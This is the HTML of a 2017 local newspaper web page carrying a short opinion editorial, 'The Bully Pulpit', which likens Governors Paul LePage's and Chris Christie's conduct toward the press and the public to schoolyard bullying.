<li id="menu-item-8387" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-8387"><a href="http://roslyn-news.com/contact-us/">Contact Us</a></li>
<li id="menu-item-7827" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-7827"><a href="http://roslyn-news.com/newspaper-in-education/">Newspaper In Education</a>
<ul class="sub-menu">
	<li id="menu-item-9177" class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9177"><a href="https://longislandweekly.com/category/newspaper-in-education/">Lesson Plans</a></li>
</ul>
</li>
</ul></div></div>
        <div class="td-header-sp-top-widget">
    <span class="td-social-icon-wrap"><a target="_blank" href="https://www.facebook.com/TheRoslynNews" title="Facebook"><i class="td-icon-font td-icon-facebook"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://plus.google.com/111660607406859641288" title="Google+"><i class="td-icon-font td-icon-googleplus"></i></a></span><span class="td-social-icon-wrap"><a target="_blank" href="https://twitter.com/RoslynNews" title="Twitter"><i class="td-icon-font td-icon-twitter"></i></a></span></div>
    </div>

        </div>
    </div>

    <div class="td-banner-wrap-full td-logo-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                    <a href="http://roslyn-news.com/">
        <img class="td-retina-data" data-retina="http://roslyn-news.com/wp-content/uploads/2017/03/Roslyn_WebLogo-544x180-300x99.jpg" src="http://roslyn-news.com/wp-content/uploads/2016/04/Roslyn_WebLogo-300x200.jpg" alt=""/>
    </a>
            </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap td-header-gradient">
            <div class="td-container td-header-row td-header-main-menu">
                <div id="td-header-menu">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo">
        		<a href="http://roslyn-news.com/">
			<img class="td-retina-data" data-retina="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn_WebLogo-280x110.jpg" src="http://roslyn-news.com/wp-content/uploads/2016/10/Roslyn_WebLogo-140x55.jpg" alt=""/>
		</a>
	    </div>
    <div class="menu-main-menu-container"><ul id="menu-main-menu-1" class="sf-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-130"><a href="http://roslyn-news.com">Home</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-131"><a href="http://roslyn-news.com/category/news/">Roslyn News</a></li>
<li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children td-menu-item td-normal-menu menu-item-205"><a href="http://roslyn-news.com/events/">Events</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-1872"><a href="http://www.roslyn-news.com/events">All Events</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-136"><a href="http://roslyn-news.com/category/school-news/">School News</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-7567"><a href="http://roslyn-news.com/category/sports/">Sports</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-7566"><a href="http://roslyn-news.com/category/obituaries/">Obituaries</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children td-menu-item td-normal-menu menu-item-9832"><a href="http://roslyn-news.com/category/opinion/">Opinion</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-9833"><a href="http://roslyn-news.com/category/opinion/columns/">Columns</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-9834"><a href="http://roslyn-news.com/category/opinion/editorials/">Editorials</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-9835"><a href="http://roslyn-news.com/category/opinion/letters-to-the-editor/">Letters to the Editor</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-7429"><a href="http://roslyn-news.com/category/magazine/">Magazine</a></li>
<li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children td-menu-item td-normal-menu menu-item-8711"><a href="http://longislandweekly.com/category/specials/">Specials</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8720"><a href="http://longislandweekly.com/category/specials/automotive/">Automotive</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8713"><a href="http://longislandweekly.com/category/specials/banking-finance/">Banking &#038; Finance</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8712"><a href="http://longislandweekly.com/category/specials/camps-schools/">Camps &#038; Schools</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8714"><a href="http://longislandweekly.com/category/specials/automotive/">Education</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8715"><a href="http://longislandweekly.com/category/specials/healthy-living">Healthy Living</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8716"><a href="http://longislandweekly.com/category/specials/asa-house-home/">Home Design</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8717"><a href="http://longislandweekly.com/category/specials/senior-living/">Senior Living</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8718"><a href="http://longislandweekly.com/category/specials/vacation-travel/">Vacation &#038; Travel</a></li>
	<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-8719"><a href="http://longislandweekly.com/category/specials/wine-dine/">Wine &#038; Dine</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-custom menu-item-object-custom td-menu-item td-normal-menu menu-item-9527"><a href="https://longislandweekly.com/category/classifieds/">Classifieds</a></li>
</ul></div></div>


<div class="td-search-wrapper">
    <div id="td-top-search">
        <!-- Search -->
        <div class="header-search-wrap">
            <div class="dropdown header-search">
                <a id="td-header-search-button" href="#" role="button" class="dropdown-toggle " data-toggle="dropdown"><i class="td-icon-search"></i></a>
            </div>
        </div>
    </div>
</div>

<div class="header-search-wrap">
	<div class="dropdown header-search">
		<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
			<form role="search" method="get" class="td-search-form" action="http://roslyn-news.com/">
				<div class="td-head-form-search-wrap">
					<input id="td-header-search" type="text" value="" name="s" autocomplete="off" /><input class="wpb_button wpb_btn-inverse btn" type="submit" id="td-header-search-top" value="Search" />
				</div>
			</form>
			<div id="td-aj-search"></div>
		</div>
	</div>
</div>            </div>
        </div>
    </div>

</div><div class="td-main-content-wrap">

    <div class="td-container td-post-template-default ">
        <div class="td-crumb-container"><div class="entry-crumbs"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="" class="entry-crumb" itemprop="url" href="http://roslyn-news.com/"><span itemprop="title">Home</span></a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in Opinion" class="entry-crumb" itemprop="url" href="http://roslyn-news.com/category/opinion/"><span itemprop="title">Opinion</span></a></span> <i class="td-icon-right td-bread-sep"></i> <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a title="View all posts in Editorials" class="entry-crumb" itemprop="url" href="http://roslyn-news.com/category/opinion/editorials/"><span itemprop="title">Editorials</span></a></span> <i class="td-icon-right td-bread-sep td-bred-no-url-last"></i> <span class="td-bred-no-url-last" itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><meta itemprop="title" content = "Editorial: The Bully Pulpit"><meta itemprop="url" content = "http://roslyn-news.com/editorial-the-bully-pulpit/">Editorial: The Bully Pulpit</span></div></div>

        <div class="td-pb-row">
                                    <div class="td-pb-span8 td-main-content" role="main">
                            <div class="td-ss-main-content">
                                
    <article id="post-9868" class="post-9868 post type-post status-publish format-standard has-post-thumbnail hentry category-editorials category-opinion" itemscope itemtype="http://schema.org/Article">
        <div class="td-post-header">

            <ul class="td-category"><li class="entry-category"><a  href="http://roslyn-news.com/category/opinion/">Opinion</a></li><li class="entry-category"><a  href="http://roslyn-news.com/category/opinion/editorials/">Editorials</a></li></ul>
            <header class="td-post-title">
                <h1 class="entry-title">Editorial: The Bully Pulpit</h1>

                

                <div class="td-module-meta-info">
                    <div class="td-post-author-name">By <a href="http://hicksvillenews.com/author/smosco/">Steve Mosco</a> - </div>                    <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-07-14T13:25:19+00:00" >July 14, 2017</time></div>                    <div class="td-post-comments"><a href="http://roslyn-news.com/editorial-the-bully-pulpit/#respond"><i class="td-icon-comments"></i>0</a></div>                    <div class="td-post-views"><i class="td-icon-views"></i><span class="td-nr-views-9868">24</span></div>                </div>

            </header>

        </div>

        <div class="td-post-sharing td-post-sharing-top ">
				<div class="td-default-sharing">
		            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Share on Facebook</div></a>
		            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Editorial%3A+The+Bully+Pulpit&url=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F&via=Roslyn+News"  ><i class="td-icon-twitter"></i><div class="td-social-but-text">Tweet on Twitter</div></a>
		            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://roslyn-news.com/editorial-the-bully-pulpit/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
		            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://roslyn-news.com/editorial-the-bully-pulpit/&amp;media=http://roslyn-news.com/wp-content/uploads/2017/07/PaulLePage.jpg&description=Editorial%3A+The+Bully+Pulpit" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
		            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Editorial%3A+The+Bully+Pulpit - http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F" ><i class="td-icon-whatsapp"></i></a>
	            </div></div>

        <div class="td-post-content">

        
        <div class="td-a-rec td-a-rec-id-content_top "><!-- /33457410/Roslyn_InnerPage_Leader -->
<div id='div-gpt-ad-1463590648591-6' style='height:90px; width:728px;'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463590648591-6'); });
</script>
</div></div><figure id="attachment_4531" style="width: 269px" class="wp-caption alignright"><a href="http://hicksvillenews.com/wp-content/uploads/2017/07/PaulLePage.jpg"><img class="size-full wp-image-4531" src="http://hicksvillenews.com/wp-content/uploads/2017/07/PaulLePage.jpg" alt="" width="269" height="293" /></a><figcaption class="wp-caption-text">Paul LePage</figcaption></figure>
<p>Many local schools rightfully have anti-bullying programs that call on students and teachers to recognize schoolyard bullying when it is happening, stand up to it and stamp it out before it goes too far.</p>
<p>The hope is that if they are disciplined early, bullies will admit their mistakes and learn to treat their peers like human beings—with a measure of understanding and compassion. Unfortunately, these lessons do not always stick and sometimes a bully finds himself elected to public office.</p>
<p>Last week, Maine’s Governor Paul LaPage—as bombastically foolish as any elected official in the country—suggested that he sometimes formulates false stories in order to mislead reporters. In published reports, LaPage oozed out his continued disdain for print media, saying “the sooner the print press goes away, the better society will be.”</p>
<p>There are few statements as stupid and as willfully ignorant of history as that statement by LaPage.</p>
<p>Meanwhile, New Jersey Governor Chris Christie was caught relaxing with his family on a beach last week—the very same beach he ordered closed to the public as part of a Jersey government shutdown. “I didn’t get any sun today,” bellowed Christie, before those aerial photos became public.</p>
<p>When schoolyard bullies are confronted for their heinous actions, they often react in one of two ways: they either deny any culpability or they lash out verbally in full defense mode. No matter which tactic they employ, there is almost always a parent or two that will enthusiastically join in the victim-blaming.</p>
<p>And that is where we are in the country. Bullish elected officials attack media outlets, blaming reporters and newspaper staff for the woes of society, while supporters cheer them on with pitchforks raised in the air—nary a thought given to the importance of the press throughout history.</p>
<p style="text-align: right;"><strong>—Steve Mosco</strong></p>
<div class="td-a-rec td-a-rec-id-content_bottom "><div style="text-align:center;"><a href="http://antonnews.com/subscribe" target="_blank"><img src="http://roslyn-news.com/wp-content/uploads/2016/06/Roslyn-Web-Subscriber-Box-1.jpg" style="max-width: 600px;margin: 0 auto;"></a></div></div>        </div>


        <footer>
                        
            <div class="td-post-source-tags">
                                            </div>

            <div class="td-post-sharing td-post-sharing-bottom td-with-like"><span class="td-post-share-title">SHARE</span>
            <div class="td-default-sharing">
	            <a class="td-social-sharing-buttons td-social-facebook" href="http://www.facebook.com/sharer.php?u=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-facebook"></i><div class="td-social-but-text">Facebook</div></a>
	            <a class="td-social-sharing-buttons td-social-twitter" href="https://twitter.com/intent/tweet?text=Editorial%3A+The+Bully+Pulpit&url=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F&via=Roslyn+News"><i class="td-icon-twitter"></i><div class="td-social-but-text">Twitter</div></a>
	            <a class="td-social-sharing-buttons td-social-google" href="http://plus.google.com/share?url=http://roslyn-news.com/editorial-the-bully-pulpit/" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-googleplus"></i></a>
	            <a class="td-social-sharing-buttons td-social-pinterest" href="http://pinterest.com/pin/create/button/?url=http://roslyn-news.com/editorial-the-bully-pulpit/&amp;media=http://roslyn-news.com/wp-content/uploads/2017/07/PaulLePage.jpg&description=Editorial%3A+The+Bully+Pulpit" onclick="window.open(this.href, 'mywin','left=50,top=50,width=600,height=350,toolbar=0'); return false;"><i class="td-icon-pinterest"></i></a>
	            <a class="td-social-sharing-buttons td-social-whatsapp" href="whatsapp://send?text=Editorial%3A+The+Bully+Pulpit - http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F" ><i class="td-icon-whatsapp"></i></a>
            </div><div class="td-classic-sharing"><ul><li class="td-classic-facebook"><iframe frameBorder="0" src="http://www.facebook.com/plugins/like.php?href=http://roslyn-news.com/editorial-the-bully-pulpit/&amp;layout=button_count&amp;show_faces=false&amp;width=105&amp;action=like&amp;colorscheme=light&amp;height=21" style="border:none; overflow:hidden; width:105px; height:21px; background-color:transparent;"></iframe></li><li class="td-classic-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="http://roslyn-news.com/editorial-the-bully-pulpit/" data-text="Editorial: The Bully Pulpit" data-via="" data-lang="en">tweet</a> <script>!function(d,s,id){var js,fjs=d.getElementsByTagName(s)[0];if(!d.getElementById(id)){js=d.createElement(s);js.id=id;js.src="//platform.twitter.com/widgets.js";fjs.parentNode.insertBefore(js,fjs);}}(document,"script","twitter-wjs");</script></li></ul></div></div>            <div class="td-block-row td-post-next-prev"><div class="td-block-span6 td-post-prev-post"><div class="td-post-next-prev-content"><span>Previous article</span><a href="http://roslyn-news.com/editorial-yes-and-no/">Editorial: Yes And No</a></div></div><div class="td-next-prev-separator"></div><div class="td-block-span6 td-post-next-post"><div class="td-post-next-prev-content"><span>Next article</span><a href="http://roslyn-news.com/supervisor-bosworth-and-town-board-host-annual-intern-breakfast/">Supervisor Bosworth And Town Board Host Annual Intern Breakfast</a></div></div></div>            <div class="author-box-wrap"><a href="http://hicksvillenews.com/author/smosco/"><img width="96" height="96" src="http://roslyn-news.com/wp-content/uploads/2017/01/Steve-Mosco-150x150.jpg" class="avatar avatar-96 photo" alt="" srcset="http://roslyn-news.com/wp-content/uploads/2017/01/Steve-Mosco-150x150.jpg 150w, http://roslyn-news.com/wp-content/uploads/2017/01/Steve-Mosco-300x300.jpg 300w, http://roslyn-news.com/wp-content/uploads/2017/01/Steve-Mosco-420x420.jpg 420w, http://roslyn-news.com/wp-content/uploads/2017/01/Steve-Mosco.jpg 500w" sizes="(max-width: 96px) 100vw, 96px" /></a><div class="desc"><div class="td-author-name vcard author"><span class="fn"><a href="http://hicksvillenews.com/author/smosco/">Steve Mosco</a></span></div><div class="td-author-description"></div><div class="td-author-social"></div><div class="clearfix"></div></div></div>	        <span style="display: none;" itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Steve Mosco"></span><meta itemprop="datePublished" content="2017-07-14T13:25:19+00:00"><meta itemprop="dateModified" content="2017-07-14T13:25:19+00:00"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="http://roslyn-news.com/editorial-the-bully-pulpit/"/><span style="display: none;" itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><span style="display: none;" itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://roslyn-news.com/wp-content/uploads/2016/04/Roslyn_WebLogo-300x200.jpg"></span><meta itemprop="name" content="Roslyn News"></span><meta itemprop="headline " content="Editorial: The Bully Pulpit"><span style="display: none;" itemprop="image" itemscope itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="http://roslyn-news.com/wp-content/uploads/2017/07/PaulLePage.jpg"><meta itemprop="width" content="269"><meta itemprop="height" content="293"></span>        </footer>

    </article> <!-- /.post -->

    <script>var block_td_uid_1_5992822bef764 = new tdBlock();
block_td_uid_1_5992822bef764.id = "td_uid_1_5992822bef764";
block_td_uid_1_5992822bef764.atts = '{"limit":3,"ajax_pagination":"next_prev","live_filter":"cur_post_same_categories","td_ajax_filter_type":"td_custom_related","class":"td_uid_1_5992822bef764_rand","td_column_number":3,"live_filter_cur_post_id":9868,"live_filter_cur_post_author":"38"}';
block_td_uid_1_5992822bef764.td_column_number = "3";
block_td_uid_1_5992822bef764.block_type = "td_block_related_posts";
block_td_uid_1_5992822bef764.post_count = "3";
block_td_uid_1_5992822bef764.found_posts = "160";
block_td_uid_1_5992822bef764.header_color = "";
block_td_uid_1_5992822bef764.ajax_pagination_infinite_stop = "";
block_td_uid_1_5992822bef764.max_num_pages = "54";
tdBlocksArray.push(block_td_uid_1_5992822bef764);
</script><div class="td_block_wrap td_block_related_posts td_uid_1_5992822bef764_rand td_with_ajax_pagination td-pb-border-top"><h4 class="td-related-title"><a id="td_uid_2_5992822c0102c" class="td-related-left td-cur-simple-item" data-td_filter_value="" data-td_block_id="td_uid_1_5992822bef764" href="#">RELATED ARTICLES</a><a id="td_uid_3_5992822c0229a" class="td-related-right" data-td_filter_value="td_related_more_from_author" data-td_block_id="td_uid_1_5992822bef764" href="#">MORE FROM AUTHOR</a></h4><div id=td_uid_1_5992822bef764 class="td_block_inner">

	<div class="td-related-row">

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://roslyn-news.com/editorial-cannabis-qualifiers/" rel="bookmark" title="Editorial: Cannabis Qualifiers"><img width="218" height="150" class="entry-thumb" src="http://roslyn-news.com/wp-content/uploads/2017/08/marijuana-1549805_1280-218x150.jpg" alt="" title="Editorial: Cannabis Qualifiers"/></a></div>                <a href="http://roslyn-news.com/category/opinion/editorials/" class="td-post-category">Editorials</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://roslyn-news.com/editorial-cannabis-qualifiers/" rel="bookmark" title="Editorial: Cannabis Qualifiers">Editorial: Cannabis Qualifiers</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://roslyn-news.com/editorial-dr-strangelove-2017/" rel="bookmark" title="Editorial &#8211; Dr. Strangelove: 2017"><img width="218" height="150" class="entry-thumb" src="http://roslyn-news.com/wp-content/uploads/2017/08/Dr_Strangelove_-_The_War_Room-218x150.png" alt="" title="Editorial &#8211; Dr. Strangelove: 2017"/></a></div>                <a href="http://roslyn-news.com/category/opinion/editorials/" class="td-post-category">Editorials</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://roslyn-news.com/editorial-dr-strangelove-2017/" rel="bookmark" title="Editorial &#8211; Dr. Strangelove: 2017">Editorial &#8211; Dr. Strangelove: 2017</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 -->

	<div class="td-related-span4">

        <div class="td_module_related_posts td-animation-stack td_mod_related_posts">
            <div class="td-module-image">
                <div class="td-module-thumb"><a href="http://roslyn-news.com/editorial-questions-for-clowns/" rel="bookmark" title="Editorial: Questions For Clowns"><img width="218" height="150" class="entry-thumb" src="http://roslyn-news.com/wp-content/uploads/2017/08/clown-906961_1280-218x150.jpg" alt="" title="Editorial: Questions For Clowns"/></a></div>                <a href="http://roslyn-news.com/category/opinion/editorials/" class="td-post-category">Editorials</a>            </div>
            <div class="item-details">
                <h3 class="entry-title td-module-title"><a href="http://roslyn-news.com/editorial-questions-for-clowns/" rel="bookmark" title="Editorial: Questions For Clowns">Editorial: Questions For Clowns</a></h3>            </div>
        </div>
        
	</div> <!-- ./td-related-span4 --></div><!--./row-fluid--></div><div class="td-next-prev-wrap"><a href="#" class="td-ajax-prev-page ajax-page-disabled" id="prev-page-td_uid_1_5992822bef764" data-td_block_id="td_uid_1_5992822bef764"><i class="td-icon-font td-icon-menu-left"></i></a><a href="#"  class="td-ajax-next-page" id="next-page-td_uid_1_5992822bef764" data-td_block_id="td_uid_1_5992822bef764"><i class="td-icon-font td-icon-menu-right"></i></a></div></div> <!-- ./block -->

	<div class="comments" id="comments">
        
            <div class="td-comments-title-wrap ">
                <h4 class="block-title"><span>NO COMMENTS</span></h4>
            </div>

            
		<div id="respond" class="comment-respond">
							<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/editorial-the-bully-pulpit/#respond" style="display:none;">Cancel reply</a></small></h3>
						<form id="commentform" class="comment-form">
				<iframe src="http://jetpack.wordpress.com/jetpack-comment/?blogid=110631625&#038;postid=9868&#038;comment_registration=0&#038;require_name_email=1&#038;stc_enabled=1&#038;stb_enabled=1&#038;show_avatars=1&#038;avatar_default=mystery&#038;greeting=Leave+a+Reply&#038;greeting_reply=Leave+a+Reply+to+%25s&#038;color_scheme=light&#038;lang=en_US&#038;jetpack_version=5.2.1&#038;sig=a6b3da8b6a29d53652450ad4796d186a9978ee64#parent=http%3A%2F%2Froslyn-news.com%2Feditorial-the-bully-pulpit%2F" style="width:100%; height: 430px; border:0;" name="jetpack_remote_comment" class="jetpack_remote_comment" id="jetpack_remote_comment"></iframe>
				<!--[if !IE]><!-->
				<script>
					document.addEventListener( 'DOMContentLoaded', function () {
						var commentForms = document.getElementsByClassName( 'jetpack_remote_comment' );
						for ( var i = 0; i < commentForms.length; i++ ) {
							commentForms[i].allowTransparency = false;
							commentForms[i].scrolling = 'no';
						}
					} );
				</script>
				<!--<![endif]-->
			</form>
		</div>

		
		<input type="hidden" name="comment_parent" id="comment_parent" value="" />

		    </div> <!-- /.content -->
                            </div>
                        </div>
                        <div class="td-pb-span4 td-main-sidebar" role="complementary">
                            <div class="td-ss-main-sidebar">
                                <script>var block_td_uid_4_5992822c09b04 = new tdBlock();
block_td_uid_4_5992822c09b04.id = "td_uid_4_5992822c09b04";
block_td_uid_4_5992822c09b04.atts = '{"custom_title":"Featured","custom_url":"http:\/\/roslyn-news.com\/category\/featured\/","header_text_color":"#","header_color":"#","post_ids":"","category_id":"205","category_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","sort":"","limit":"3","offset":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","td_ajax_preloading":"","ajax_pagination":"","ajax_pagination_infinite_stop":"","class":"td_block_widget td_uid_4_5992822c09b04_rand"}';
block_td_uid_4_5992822c09b04.td_column_number = "1";
block_td_uid_4_5992822c09b04.block_type = "td_block_7";
block_td_uid_4_5992822c09b04.post_count = "3";
block_td_uid_4_5992822c09b04.found_posts = "180";
block_td_uid_4_5992822c09b04.header_color = "#";
block_td_uid_4_5992822c09b04.ajax_pagination_infinite_stop = "";
block_td_uid_4_5992822c09b04.max_num_pages = "60";
tdBlocksArray.push(block_td_uid_4_5992822c09b04);
</script><div class="td_block_wrap td_block_7 td_block_widget td_uid_4_5992822c09b04_rand td_with_ajax_pagination td-pb-border-top"><h4 class="block-title"><a href="http://roslyn-news.com/category/featured/">Featured</a></h4><div id=td_uid_4_5992822c09b04 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://roslyn-news.com/supervisor-bosworth-and-town-board-host-annual-intern-breakfast/" rel="bookmark" title="Supervisor Bosworth And Town Board Host Annual Intern Breakfast"><img width="100" height="70" class="entry-thumb" src="http://roslyn-news.com/wp-content/uploads/2017/08/DSC_1792-2-2-100x70.jpg" alt="" title="Supervisor Bosworth And Town Board Host Annual Intern Breakfast"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://roslyn-news.com/supervisor-bosworth-and-town-board-host-annual-intern-breakfast/" rel="bookmark" title="Supervisor Bosworth And Town Board Host Annual Intern Breakfast">Supervisor Bosworth And Town Board Host Annual Intern Breakfast</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-08-03T15:54:09+00:00" >August 3, 2017</time></div>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://roslyn-news.com/the-people-get-to-speak-and-listen/" rel="bookmark" title="The People Get To Speak, And Listen"><img width="100" height="70" class="entry-thumb" src="http://roslyn-news.com/wp-content/uploads/2017/06/SuozziTownHall_A-100x70.jpg" alt="" title="The People Get To Speak, And Listen"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://roslyn-news.com/the-people-get-to-speak-and-listen/" rel="bookmark" title="The People Get To Speak, And Listen">The People Get To Speak, And Listen</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-06-29T08:46:33+00:00" >June 29, 2017</time></div>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://roslyn-news.com/residents-win-long-legal-battle/" rel="bookmark" title="Residents Win Long Legal Battle"><img width="100" height="70" class="entry-thumb" src="http://roslyn-news.com/wp-content/uploads/2017/06/Village-of-Roslyn-100x70.jpg" alt="" title="Residents Win Long Legal Battle"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://roslyn-news.com/residents-win-long-legal-battle/" rel="bookmark" title="Residents Win Long Legal Battle">Residents Win Long Legal Battle</a></h3>            <div class="td-module-meta-info">
                                                <div class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-06-28T17:59:44+00:00" >June 28, 2017</time></div>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block --><div class="td-a-rec td-a-rec-id-custom_ad_1 "><!-- /33457410/Ros_ATF_Cube -->
<div id='div-gpt-ad-1463590648591-1'>
<script type='text/javascript'>
googletag.cmd.push(function() { googletag.display('div-gpt-ad-1463590648591-1'); });
</script>
</div>
</div><aside class="widget widget_em_calendar"><div class="block-title"><span>Calendar</span></div><div id="em-calendar-156" class="em-calendar-wrapper"><table class="em-calendar">
	<thead>
		<tr>
			<td><a class="em-calnav em-calnav-prev" href="/editorial-the-bully-pulpit/?ajaxCalendar=1&#038;mo=7&#038;yr=2017" rel="nofollow">&lt;&lt;</a></td>
			<td class="month_name" colspan="5">Aug 2017</td>
			<td><a class="em-calnav em-calnav-next" href="/editorial-the-bully-pulpit/?ajaxCalendar=1&#038;mo=9&#038;yr=2017" rel="nofollow">&gt;&gt;</a></td>
		</tr>
	</thead>
	<tbody>
		<tr class="days-names">
			<td>M</td><td>T</td><td>W</td><td>T</td><td>F</td><td>S</td><td>S</td>
		</tr>
		<tr>
							<td class="eventless-pre">
										31									</td>
								<td class="eventless">
										1									</td>
								<td class="eventless">
										2									</td>
								<td class="eventless">
										3									</td>
								<td class="eventless">
										4									</td>
								<td class="eventless">
										5									</td>
								<td class="eventless">
										6									</td>
				</tr><tr>				<td class="eventless">
										7									</td>
								<td class="eventless">
										8									</td>
								<td class="eventless">
										9									</td>
								<td class="eventless">
										10									</td>
								<td class="eventless">
										11									</td>
								<td class="eventless">
										12									</td>
								<td class="eventless">
										13									</td>
				</tr><tr>				<td class="eventless">
										14									</td>
								<td class="eventless-today">
										15									</td>
								<td class="eventless">
										16									</td>
								<td class="eventless">
										17									</td>
								<td class="eventless">
										18									</td>
								<td class="eventless">
										19									</td>
								<td class="eventless">
										20									</td>
